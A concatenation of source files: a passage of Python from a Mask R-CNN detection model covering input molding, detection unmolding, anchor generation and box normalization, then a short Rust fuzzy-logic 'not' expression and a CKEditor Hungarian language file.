windows: [N, (y1, x1, y2, x2)]. The portion of the image that has the
original image (padding excluded).
"""
molded_images = []
image_metas = []
windows = []
for image in images:
# Resize image
# TODO: move resizing to mold_image()
molded_image, window, scale, padding, crop = utils.resize_image(
image,
min_dim=self.config.IMAGE_MIN_DIM,
min_scale=self.config.IMAGE_MIN_SCALE,
max_dim=self.config.IMAGE_MAX_DIM,
mode=self.config.IMAGE_RESIZE_MODE)
molded_image = mold_image(molded_image, self.config)
# Build image_meta
image_meta = compose_image_meta(
0, image.shape, molded_image.shape, window, scale,
np.zeros([self.config.NUM_CLASSES], dtype=np.int32))
# Append
molded_images.append(molded_image)
windows.append(window)
image_metas.append(image_meta)
# Pack into arrays
molded_images = np.stack(molded_images)
image_metas = np.stack(image_metas)
windows = np.stack(windows)
return molded_images, image_metas, windows
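# Example of the shapes involved (assuming the default "square" resize mode
# with IMAGE_MAX_DIM == 1024): two input images of any sizes come back as
# molded_images of shape (2, 1024, 1024, 3), image_metas of shape
# (2, 12 + NUM_CLASSES), and windows of shape (2, 4).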
def unmold_detections(self, detections, mrcnn_mask, original_image_shape,
image_shape, window):
"""Reformats the detections of one image from the format of the neural
network output to a format suitable for use in the rest of the
application.
detections: [N, (y1, x1, y2, x2, class_id, score)] in normalized coordinates
mrcnn_mask: [N, height, width, num_classes]
original_image_shape: [H, W, C] Original image shape before resizing
image_shape: [H, W, C] Shape of the image after resizing and padding
window: [y1, x1, y2, x2] Pixel coordinates of box in the image where the real
image is excluding the padding.
Returns:
boxes: [N, (y1, x1, y2, x2)] Bounding boxes in pixels
class_ids: [N] Integer class IDs for each bounding box
scores: [N] Float probability scores of the class_id
masks: [height, width, num_instances] Instance masks
"""
# How many detections do we have?
# Detections array is padded with zeros. Find the first class_id == 0.
zero_ix = np.where(detections[:, 4] == 0)[0]
N = zero_ix[0] if zero_ix.shape[0] > 0 else detections.shape[0]
# Extract boxes, class_ids, scores, and class-specific masks
boxes = detections[:N, :4]
class_ids = detections[:N, 4].astype(np.int32)
scores = detections[:N, 5]
masks = mrcnn_mask[np.arange(N), :, :, class_ids]
# Translate normalized coordinates in the resized image to pixel
# coordinates in the original image before resizing
window = utils.norm_boxes(window, image_shape[:2])
wy1, wx1, wy2, wx2 = window
shift = np.array([wy1, wx1, wy1, wx1])
wh = wy2 - wy1 # window height
ww = wx2 - wx1 # window width
scale = np.array([wh, ww, wh, ww])
# Convert boxes to normalized coordinates on the window
boxes = np.divide(boxes - shift, scale)
# Convert boxes to pixel coordinates on the original image
boxes = utils.denorm_boxes(boxes, original_image_shape[:2])
# Filter out detections with zero area. Happens in early training when
# network weights are still random
exclude_ix = np.where(
(boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
masks = np.delete(masks, exclude_ix, axis=0)
N = class_ids.shape[0]
# Resize masks to original image size and set boundary threshold.
full_masks = []
for i in range(N):
# Convert neural network mask to full size mask
full_mask = utils.unmold_mask(masks[i], boxes[i], original_image_shape)
full_masks.append(full_mask)
full_masks = np.stack(full_masks, axis=-1)\
if full_masks else np.empty(original_image_shape[:2] + (0,))
return boxes, class_ids, scores, full_masks
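# Worked example of the window arithmetic above (illustrative numbers): for a
# 1024x1024 molded image whose 800x600 original occupies the window
# (112, 212, 912, 812), a detection whose corner sits exactly at the window's
# top-left maps to pixel (0, 0) of the original image after the shift/scale
# and denorm_boxes steps.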
def detect(self, images, verbose=0):
"""Runs the detection pipeline.
images: List of images, potentially of different sizes.
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
assert self.mode == "inference", "Create model in inference mode."
assert len(
images) == self.config.BATCH_SIZE, "len(images) must be equal to BATCH_SIZE"
if verbose:
log("Processing {} images".format(len(images)))
for image in images:
log("image", image)
# Mold inputs to format expected by the neural network
molded_images, image_metas, windows = self.mold_inputs(images)
# Validate image sizes
# All images in a batch MUST be of the same size
image_shape = molded_images[0].shape
for g in molded_images[1:]:
assert g.shape == image_shape,\
"After resizing, all images must have the same size. Check IMAGE_RESIZE_MODE and image sizes."
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
if verbose:
log("molded_images", molded_images)
log("image_metas", image_metas)
log("anchors", anchors)
# Run object detection
detections, _, _, mrcnn_mask, _, _, _ =\
self.keras_model.predict([molded_images, image_metas, anchors], verbose=0)
# Process detections
results = []
for i, image in enumerate(images):
final_rois, final_class_ids, final_scores, final_masks =\
self.unmold_detections(detections[i], mrcnn_mask[i],
image.shape, molded_images[i].shape,
windows[i])
results.append({
"rois": final_rois,
"class_ids": final_class_ids,
"scores": final_scores,
"masks": final_masks,
})
return results
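# Minimal inference sketch (assumes an inference-mode model with
# BATCH_SIZE == 1):
#
#   results = model.detect([image], verbose=1)
#   r = results[0]
#   # r["rois"], r["class_ids"], r["scores"], r["masks"]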
def detect_molded(self, molded_images, image_metas, verbose=0):
"""Runs the detection pipeline, but expect inputs that are
molded already. Used mostly for debugging and inspecting
the model.
molded_images: List of images loaded using load_image_gt()
image_metas: image meta data, also returned by load_image_gt()
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
assert self.mode == "inference", "Create model in inference mode."
assert len(molded_images) == self.config.BATCH_SIZE,\
"Number of images must be equal to BATCH_SIZE"
if verbose:
log("Processing {} images".format(len(molded_images)))
for image in molded_images:
log("image", image)
# Validate image sizes
# All images in a batch MUST be of the same size
image_shape = molded_images[0].shape
for g in molded_images[1:]:
assert g.shape == image_shape, "Images must have the same size"
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
if verbose:
log("molded_images", molded_images)
log("image_metas", image_metas)
log("anchors", anchors)
# Run object detection
detections, _, _, mrcnn_mask, _, _, _ =\
self.keras_model.predict([molded_images, image_metas, anchors], verbose=0)
# Process detections
results = []
for i, image in enumerate(molded_images):
window = [0, 0, image.shape[0], image.shape[1]]
final_rois, final_class_ids, final_scores, final_masks =\
self.unmold_detections(detections[i], mrcnn_mask[i],
image.shape, molded_images[i].shape,
window)
results.append({
"rois": final_rois,
"class_ids": final_class_ids,
"scores": final_scores,
"masks": final_masks,
})
return results
def get_anchors(self, image_shape):
"""Returns anchor pyramid for the given image size."""
backbone_shapes = compute_backbone_shapes(self.config, image_shape)
# Cache anchors and reuse if image shape is the same
if not hasattr(self, "_anchor_cache"):
self._anchor_cache = {}
if not tuple(image_shape) in self._anchor_cache:
# Generate Anchors
a = utils.generate_pyramid_anchors(
self.config.RPN_ANCHOR_SCALES,
self.config.RPN_ANCHOR_RATIOS,
backbone_shapes,
self.config.BACKBONE_STRIDES,
self.config.RPN_ANCHOR_STRIDE)
# Keep a copy of the latest anchors in pixel coordinates because
# it's used in inspect_model notebooks.
# TODO: Remove this after the notebooks are refactored to not use it
self.anchors = a
# Normalize coordinates
self._anchor_cache[tuple(image_shape)] = utils.norm_boxes(a, image_shape[:2])
return self._anchor_cache[tuple(image_shape)]
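# Because of the cache, repeated calls with the same shape are cheap:
#
#   a1 = model.get_anchors((1024, 1024, 3))
#   a2 = model.get_anchors((1024, 1024, 3))  # served from _anchor_cache
#
# Note the returned anchors are in normalized coordinates; the pixel-space
# copy is kept on self.anchors.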
def ancestor(self, tensor, name, checked=None):
"""Finds the ancestor of a TF tensor in the computation graph.
tensor: TensorFlow symbolic tensor.
name: Name of ancestor tensor to find
checked: For internal use. A list of tensors that were already
searched to avoid loops in traversing the graph.
"""
checked = checked if checked is not None else []
# Put a limit on how deep we go to avoid very long loops
if len(checked) > 500:
return None
# Convert name to a regex and allow matching a number prefix
# because Keras adds them automatically
if isinstance(name, str):
name = re.compile(name.replace("/", r"(\_\d+)*/"))
parents = tensor.op.inputs
for p in parents:
if p in checked:
continue
if bool(re.fullmatch(name, p.name)):
return p
checked.append(p)
a = self.ancestor(p, name, checked)
if a is not None:
return a
return None
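# Example of the name-to-regex conversion above: "rpn_class/output" becomes
# r"rpn_class(\_\d+)*/output", which also matches "rpn_class_2/output", the
# kind of suffixed name Keras generates when a layer is reused.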
def find_trainable_layer(self, layer):
"""If a layer is encapsulated by another layer, this function
digs through the encapsulation and returns the layer that holds
the weights.
"""
if layer.__class__.__name__ == 'TimeDistributed':
return self.find_trainable_layer(layer.layer)
return layer
def get_trainable_layers(self):
"""Returns a list of layers that have weights."""
layers = []
# Loop through all layers
for l in self.keras_model.layers:
# If layer is a wrapper, find inner trainable layer
l = self.find_trainable_layer(l)
# Include layer if it has weights
if l.get_weights():
layers.append(l)
return layers
def run_graph(self, images, outputs, image_metas=None):
"""Runs a sub-set of the computation graph that computes the given
outputs.
image_metas: If provided, the images are assumed to be already
molded (i.e. resized, padded, and normalized)
outputs: List of tuples (name, tensor) to compute. The tensors are
symbolic TensorFlow tensors and the names are for easy tracking.
Returns an ordered dict of results. Keys are the names received in the
input and values are Numpy arrays.
"""
model = self.keras_model
# Organize desired outputs into an ordered dict
outputs = OrderedDict(outputs)
for o in outputs.values():
assert o is not None
# Build a Keras function to run parts of the computation graph
inputs = model.inputs
if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
kf = K.function(inputs, list(outputs.values()))
# Prepare inputs
if image_metas is None:
molded_images, image_metas, _ = self.mold_inputs(images)
else:
molded_images = images
image_shape = molded_images[0].shape
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
model_in = [molded_images, image_metas, anchors]
# Run inference
if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
model_in.append(0.)
outputs_np = kf(model_in)
# Pack the generated Numpy arrays into a dict and log the results.
outputs_np = OrderedDict([(k, v)
for k, v in zip(outputs.keys(), outputs_np)])
for k, v in outputs_np.items():
log(k, v)
return outputs_np
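# Hypothetical usage (layer name assumed from this codebase): fetch the
# proposal boxes computed for one image.
#
#   out = model.run_graph([image], [
#       ("proposals", model.keras_model.get_layer("ROI").output),
#   ])
#   out["proposals"].shape  # e.g. (1, POST_NMS_ROIS_INFERENCE, 4)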
############################################################
# Data Formatting
############################################################
def compose_image_meta(image_id, original_image_shape, image_shape,
window, scale, active_class_ids):
"""Takes attributes of an image and puts them in one 1D array.
image_id: An int ID of the image. Useful for debugging.
original_image_shape: [H, W, C] before resizing or padding.
image_shape: [H, W, C] after resizing and padding
window: (y1, x1, y2, x2) in pixels. The area of the image where the real
image is (excluding the padding)
scale: The scaling factor applied to the original image (float32)
active_class_ids: List of class_ids available in the dataset from which
the image came. Useful if training on images from multiple datasets
where not all classes are present in all datasets.
"""
meta = np.array(
[image_id] + # size=1
list(original_image_shape) + # size=3
list(image_shape) + # size=3
list(window) + # size=4 (y1, x1, y2, x2) in image coordinates
[scale] + # size=1
list(active_class_ids) # size=num_classes
)
return meta
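# The resulting vector has length 12 + NUM_CLASSES
# (1 + 3 + 3 + 4 + 1 + NUM_CLASSES), which is why the parsers below slice
# active_class_ids starting at index 12.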
def parse_image_meta(meta):
"""Parses an array that contains image attributes to its components.
See compose_image_meta() for more details.
meta: [batch, meta length] where meta length depends on NUM_CLASSES
Returns a dict of the parsed values.
"""
image_id = meta[:, 0]
original_image_shape = meta[:, 1:4]
image_shape = meta[:, 4:7]
window = meta[:, 7:11]  # (y1, x1, y2, x2) window of image in pixels
scale = meta[:, 11]
active_class_ids = meta[:, 12:]
return {
"image_id": image_id.astype(np.int32),
"original_image_shape": original_image_shape.astype(np.int32),
"image_shape": image_shape.astype(np.int32),
"window": window.astype(np.int32),
"scale": scale.astype(np.float32),
"active_class_ids": active_class_ids.astype(np.int32),
}
def parse_image_meta_graph(meta):
"""Parses a tensor that contains image attributes to its components.
See compose_image_meta() for more details.
meta: [batch, meta length] where meta length depends on NUM_CLASSES
Returns a dict of the parsed tensors.
"""
image_id = meta[:, 0]
original_image_shape = meta[:, 1:4]
image_shape = meta[:, 4:7]
window = meta[:, 7:11]  # (y1, x1, y2, x2) window of image in pixels
scale = meta[:, 11]
active_class_ids = meta[:, 12:]
return {
"image_id": image_id,
"original_image_shape": original_image_shape,
"image_shape": image_shape,
"window": window,
"scale": scale,
"active_class_ids": active_class_ids,
}
def mold_image(images, config):
"""Expects an RGB image (or array of images) and subtracts
the mean pixel and converts it to float. Expects image
colors in RGB order.
"""
return images.astype(np.float32) - config.MEAN_PIXEL
def unmold_image(normalized_images, config):
"""Takes a image normalized with mold() and returns the original."""
return (normalized_images + config.MEAN_PIXEL).astype(np.uint8)
############################################################
# Miscellaneous Graph Functions
############################################################
def trim_zeros_graph(boxes, name='trim_zeros'):
"""Often boxes are represented with matrices of shape [N, 4] and
are padded with zeros. This removes zero boxes.
boxes: [N, 4] matrix of boxes.
Returns:
boxes: [N, 4] the input boxes with zero rows removed.
non_zeros: [N] a 1D boolean mask identifying the rows to keep.
"""
non_zeros = tf.cast(tf.reduce_sum(tf.abs(boxes), axis=1), tf.bool)
boxes = tf.boolean_mask(boxes, non_zeros, name=name)
return boxes, non_zeros
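# Example: boxes [[0, 0, 0, 0], [10, 20, 30, 40]] yields
# non_zeros == [False, True] and the trimmed matrix [[10, 20, 30, 40]].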
def batch_pack_graph(x, counts, num_rows):
"""Picks different number of values from each row
in x depending on the values in counts.
"""
outputs = []
for i in range(num_rows):
outputs.append(x[i, :counts[i]])
return tf.concat(outputs, axis=0)
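# Example: with counts == [2, 1] and num_rows == 2, the result is
# tf.concat([x[0, :2], x[1, :1]], axis=0), i.e. three rows packed flat.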
def norm_boxes_graph(boxes, shape):
"""Converts boxes from pixel coordinates to normalized coordinates.
boxes: [..., (y1, x1, y2, x2)] in pixel coordinates
shape: [..., (height, width)] in pixels
Note: In pixel coordinates (y2, x2) is outside the box. But in normalized
coordinates it's inside the box.
Returns:
[..., (y1, x1, y2, x2)] in normalized coordinates
"""
h, w = tf.split(tf.cast(shape, tf.float32), 2)
scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0)
shift = tf.constant([0., 0., 1., 1.])
return tf.divide(boxes - shift, scale)
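# Example: on a 1024x1024 image the full-image pixel box (0, 0, 1024, 1024)
# maps to (0.0, 0.0, 1.0, 1.0); y2/x2 are shifted down by 1 first because in
# pixel coordinates (y2, x2) lies just outside the box.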
def denorm_boxes_graph(boxes, shape):
"""Converts boxes from normalized coordinates to pixel coordinates.
boxes: [..., (y1, x1, y2, x2)] in normalized coordinates
shape: [..., (height, width)] in pixels
Note: In pixel coordinates (y2, x2) is outside the box. But in normalized
coordinates it's inside the box.
Returns:
[..., (y1, x1, y2, x2)] in pixel coordinates
"""
h, w = tf.split(tf.cast(shape, tf.float32), 2)
scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0)
shift = tf.constant([0., 0., 1., 1.])
return tf.cast(tf.round(tf.multiply(boxes, scale) + shift), tf.int32)
not.rs
use std::fmt::{Debug, Display, Formatter, Result as FmtResult};
use std::marker::PhantomData;
use super::Expr;
use crate::opset::Opset;
use crate::value::Membership;
use crate::impl_fuzzy_expr_ops;
/// Fuzzy "and" expression.
pub struct ExprNot<S, V> {
val: V,
phantom: PhantomData<S>
}
impl<S, V> ExprNot<S, V> {
pub fn new(val: V) -> Self {
Self {
val,
phantom: PhantomData
}
}
}
impl<S, V> Clone for ExprNot<S, V>
where
V: Clone
{
fn clone(&self) -> Self {
Self::new(self.val.clone())
}
}
impl<S, V> Copy for ExprNot<S, V>
where
V: Copy
{}
impl<S, V: Debug> Debug for ExprNot<S, V> {
fn fmt(&self, f: &mut Formatter) -> FmtResult {
write!(f, "ExprNot({:?})", self.val)
}
}
impl<S, V: Display> Display for ExprNot<S, V> {
fn fmt(&self, f: &mut Formatter) -> FmtResult {
write!(f, "!{}", self.val)
}
}
impl<S, V> Expr<S> for ExprNot<S, V>
where
S: Opset,
V: Expr<S>
{
#[inline]
fn to_value(&self) -> Membership<S> {
!self.val.to_value()
}
}
impl_fuzzy_expr_ops! {
ExprNot<S, V>
}
hu.js
/*
Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang( 'about', 'hu', {
copy: 'Copyright © $1. Minden jog fenntartva.',
dlgTitle: 'CKEditor névjegy',
help: 'Itt találsz segítséget: $1',
moreInfo: 'Licenszelési információkért kérjük látogassa meg weboldalunkat:',
title: 'CKEditor névjegy',
userGuide: 'CKEditor Felhasználói útmutató'
});